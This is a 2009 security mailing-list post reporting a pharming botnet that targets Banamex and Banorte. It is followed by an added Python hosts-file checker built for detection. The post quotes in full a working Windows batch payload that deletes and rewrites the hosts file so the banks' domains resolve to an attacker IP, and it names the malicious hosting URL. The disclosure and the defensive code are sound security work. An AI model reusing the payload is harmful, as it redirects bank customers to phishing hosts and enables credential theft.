[nsp-sec] Ping Level3, Microsoft (Livefilestore.com) - banamex pharming
jose nazario
jose at arbor.net
Fri Mar 13 09:51:50 EDT 2009
Found this via shadowserver, a botnet doing pharming against Banamex:
URL (ping MSFT):
http://lrqiyw.bay.livefilestore.com/y1p1y2FN5A1m39_LYf7CjPj4AXbz9UPENMlTDifvrzr4jBV2-cCtl7qWaZ-h3u1jRZ4typbivxUAtPP4uBmte245w/hotb.txt
contents:
attrib -r %windir%\system32\drivers\etc\hosts
del %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banorte.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banorte.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banorte.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banorte.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banamex.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banamex.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.bancanetempresarial.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 bancanetempresarial.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 boveda.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.boveda.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
attrib +r %windir%\system32\drivers\etc\hosts
AS | IP | AS Name
594 | 8.14.230.179 | LVLT594-598 - Level 3 Communications, Inc.
You've got a pharming host.
-- jose
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
Arbor Networks www.arbornetworks.com
v: (734) 821 1427
PGP: 0x40A7BF94
-------------------------------------------------------------
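Added here as an example, not part of the original post or of the shadowserver data: a small Python checker that parses a Windows hosts file and flags the pattern shown in hotb.txt, namely hostnames pinned to a globally routable address (a hosts file on a client should normally only carry loopback or RFC1918 entries) and a single address collecting many distinct hostnames. The sample hosts content below is constructed from the twelve entries in hotb.txt plus the default lines Windows ships with; the brand watchlist, the cluster threshold and the function names are assumptions for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: a Windows hosts file after the batch script in the
# post has run. The pinned entries are the ones from hotb.txt; the comment
# and loopback lines are the Windows defaults; the 10.0.0.5 line is a
# benign intranet entry added to show private addresses are not flagged.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.example   # constructed benign entry
8.14.230.179 www.banorte.com.mx
8.14.230.179 www.banorte.com
8.14.230.179 banorte.com.mx
8.14.230.179 banorte.com
8.14.230.179 banamex.com.mx
8.14.230.179 www.banamex.com.mx
8.14.230.179 banamex.com
8.14.230.179 www.banamex.com
8.14.230.179 www.bancanetempresarial.banamex.com.mx
8.14.230.179 bancanetempresarial.banamex.com.mx
8.14.230.179 boveda.banamex.com.mx
8.14.230.179 www.boveda.banamex.com.mx
"""

# Assumed watchlist: registrable domains of the brands named in the post.
BRAND_WATCHLIST = ("banamex.com.mx", "banamex.com", "banorte.com.mx", "banorte.com")


def parse_hosts(text):
    """Return (ip_address, hostname) pairs from hosts-file text.

    Comments (everything after '#') and blank lines are ignored; a line
    with an unparsable address is skipped rather than raising, because a
    checker run during incident response should not die on a malformed line.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            entries.append((addr, name.lower()))
    return entries


def find_pharming(text, min_hosts=3):
    """Flag suspicious hosts-file entries.

    Returns (hits, clusters):
      hits     - list of (ip, hostname) where the address is globally
                 routable (loopback, private and link-local are normal).
      clusters - {ip: sorted hostnames} for addresses that pin at least
                 min_hosts distinct names, the pattern seen in hotb.txt.
    """
    hits = []
    by_ip = defaultdict(set)
    for addr, name in parse_hosts(text):
        if not addr.is_global:
            continue
        hits.append((str(addr), name))
        by_ip[str(addr)].add(name)
    clusters = {ip: sorted(names) for ip, names in by_ip.items()
                if len(names) >= min_hosts}
    return hits, clusters


def watchlist_hits(hits, watchlist=BRAND_WATCHLIST):
    """Return the flagged hostnames that belong to a watched brand domain."""
    return sorted({name for _, name in hits
                   if any(name == d or name.endswith("." + d) for d in watchlist)})


if __name__ == "__main__":
    hits, clusters = find_pharming(SAMPLE_HOSTS)
    for ip, names in clusters.items():
        print(f"{ip} pins {len(names)} hostnames: {', '.join(names)}")
    print("watched brands redirected:", watchlist_hits(hits))
```

Run against the sample, the checker reports one cluster (8.14.230.179 pinning twelve names, all of them on the watchlist) and nothing for the loopback or intranet lines. On a real host the same logic would read `%windir%\system32\drivers\etc\hosts`; the `attrib +r` in the script only sets the read-only attribute, so a collector with normal privileges can still read the file.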